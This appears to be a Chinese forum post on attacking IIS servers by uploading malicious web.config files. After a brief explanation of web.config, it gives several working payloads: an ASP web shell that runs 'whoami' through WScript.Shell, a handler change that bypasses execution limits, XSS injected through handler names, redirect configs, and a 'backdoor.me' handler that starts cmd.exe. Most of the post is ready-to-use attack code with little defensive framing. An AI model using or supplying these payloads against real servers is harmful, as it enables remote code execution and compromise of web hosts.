Web.config文件的方法
什么是web.config文件呢?Web.config文件是一个XML文本文件,它用来储存ASP.NETWeb 应用程序的配置信息(如最常用的设置ASP.NETWeb 应用程序的身份验证方式),它可以出现在应用程序的每一个目录中。当你通过.NET新建一个Web应用程序后,默认情况下会在根目录自动创建一个默认的Web.config文件,包括默认的配置设置,所有的子目录都继承它的配置设置。如果你想修改子目录的配置设置,你可以在该子目录下新建一个Web.config文件,它可以提供除从父目录继承的配置信息以外的配置信息,也可以重写或修改父目录中定义的设置。web.config文件放置在要目录下则会对整个网站产生影响,如果放置在其它目录之下,则只会对当前目录产生影响。
1.代码执行
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>
在web.config中添加了一个可读可写权限的处理句柄程序,然后我们在<% %>之内写入了服务器端命令执行代码。当把这个web.config文件上传成功之后,浏览访问它,就会执行系统命令whoami命令
2.绕过执行限制
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Write, Execute, Script" />
</system.webServer>
</configuration>
3.XSSiis6及以下版本不支持<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers>
<!-- XSS by using *.config -->
<add name="web_config_xss<script>alert('xss1')</script>" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="fooo" resourceType="Unspecified" requireAccess="None" preCondition="bitness64" />
<!-- XSS by using *.test -->
<add name="test_xss<script>alert('xss2')</script>" path="*.test" verb="*"/>
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
<httpErrors existingResponse="Replace" errorMode="Detailed" />
</system.webServer>
</configuration>
访问 web.config 就会弹窗4.重定向版本 < iis7<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<httpRedirect enabled="true" destination="https://www.baidu.com/" />
</system.webServer>
</configuration>
版本 >= iis7<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<rewrite>
<rules>
<rule name="AddTrailingSlashRule1" stopProcessing="true">
<match url="(.*[^/])$" />
<conditions>
<add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" />
<add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" />
</conditions>
<action type="Redirect" url="{R:1}/" />
</rule>
</rules>
</rewrite>
</system.webServer>
</configuration>
5.RCE
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<system.webServer>
<handlers>
<remove name="aspNetCore" />
<add name="aspNetCore" path="backdoor.me" verb="*" modules="AspNetCoreModule" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="cmd.exe" arguments="/c calc"/>
</system.webServer>
</configuration>
通过去访问服务器上的backdoor.me进行触发6.运行asp代码
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
Response.write("-"&"->")
'it is running the ASP code if you can see 3 by opening the web.config file!'
Response.write(1+2)
Response.write("<!-"&"-")
%>
页:
[1]